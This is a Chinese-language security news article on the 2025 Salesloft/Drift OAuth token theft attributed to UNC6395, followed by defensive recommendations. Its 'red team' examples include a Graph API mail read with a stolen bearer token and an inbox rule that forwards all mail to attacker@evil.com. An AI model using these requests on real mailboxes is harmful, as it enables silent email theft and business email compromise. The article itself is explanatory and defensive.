SaaS 黑客攻击的秘密？忘掉密码，转向令牌

谷歌警告称，最近被归因于威胁组织UNC6395的Salesloft OAuth泄露事件，并非仅限于最初报道的Salesforce。相反，此次攻击影响了所有通过OAuth连接到Salesloft的第三方SaaS集成，极大地扩大了潜在的影响范围。

在2025年8月8日至18日期间，攻击者窃取并滥用了来自Salesloft和Drift的OAuth令牌，从而能够持久地未经授权访问客户的CRM、电子邮件系统和通信平台。此次攻击活动反映了一种日益增长的模式：攻击者正从密码窃取转向OAuth令牌劫持，目标是破坏支撑现代SaaS生态系统的信任链。

漏洞事件的技术剖析 攻击向量：OAuth令牌劫持

• OAuth令牌允许SaaS应用程序（如Salesloft、Drift、Salesforce）在无需重复输入密码的情况下进行连接。
• 一旦被盗用，令牌将赋予攻击者与合法应用程序同等的API级别访问权限。
• 令牌通常是长期有效的，这使得它们对维持攻击持久性具有很高价值。

红队示例： 窃取有效OAuth令牌的攻击者可以：

1
2

GET https://graph.microsoft.com/v1.0/me/messages
Authorization: Bearer <stolen_token>

→ 无需MFA或密码即可获取所有用户电子邮件。

影响范围超出Salesforce

• 由于发现可疑的API活动，Salesforce最初禁用了Salesloft集成。
• 谷歌后来确认，任何通过OAuth连接到Salesloft的平台——包括Google Workspace、微软服务、CRM和消息平台——都可能已经暴露。

Drift漏洞利用关联

• 同一攻击活动在8月8日至18日期间也利用了通信SaaS平台Drift的漏洞。
• 这表明这是一次针对SaaS生态系统OAuth信任链的协同供应链攻击活动。

真实世界利用场景 场景1：通过OAuth令牌实现商务邮件入侵

• 攻击者使用从Salesloft窃取的OAuth令牌 → 获得对Gmail/Outlook邮箱的API访问权限。
• 他们设置收件箱转发规则：

1
2
3
4
5

POST /v1.0/me/mailFolders/inbox/messageRules
{
"displayName": "ForwardAll",
"actions": {"forwardTo": ["attacker@evil.com"]}
}

→ 静默外泄所有客户邮件。

场景2：CRM数据外泄

• 利用与Salesforce集成绑定的OAuth令牌，攻击者查询客户渠道数据。
• 被盗数据包括潜在客户、合同和客户联系列表 → 在暗网市场出售或用于鱼叉式网络钓鱼。

场景3：云环境中的持久化

• 即使用户更改了密码，OAuth令牌在明确撤销之前仍然有效。
• 攻击者在初始入侵后很长一段时间内仍能维持隐蔽的访问权限。

从事件中汲取的教训

• OAuth成为新的攻击面。令牌授予的API访问权限相当于完整的登录会话，但很少受到监控。
• 供应链盲点。像Salesloft这样的集成将多个SaaS平台连接在一起，产生了连锁风险。
• 检测缺口。许多企业记录了用户登录，但未能监控基于API的OAuth访问。

防御建议 针对企业

• 审计集成 —— 审查所有与Salesloft和Drift连接的SaaS OAuth连接。
• 撤销并轮换令牌 —— 立即撤销8月8日至18日期间存在的OAuth令牌，并强制重新认证。
• 监控API活动 —— 标记异常的API调用（例如，批量邮件导出、CRM数据拉取）。
• 使用短期令牌 —— 配置具有有限生命周期和刷新策略的OAuth令牌。
• 条件访问策略 —— 要求对令牌使用设置设备状态或基于IP的限制。

针对SaaS供应商

• 内置令牌过期机制 —— 强制实施经过持续验证的短期令牌。
• 精细化权限范围 —— 遵循最小权限原则，限制令牌权限。
• 撤销API —— 为客户提供易于使用的工具来撤销OAuth授权。
• 行为分析 —— 检测令牌是否以与正常应用行为不一致的方式被使用。

Salesloft的OAuth泄露事件凸显了当今SaaS信任链的脆弱性。通过窃取单个令牌，攻击者可以绕过MFA、密码和用户意识——直接访问跨多个互联平台的企业数据。

UNC6395的攻击活动证明，OAuth令牌劫持已成为新的凭证盗窃方式。如果没有更好的治理、监控和架构，OAuth泄露可能成为SaaS领域的下一个SolarWinds级别的供应链问题。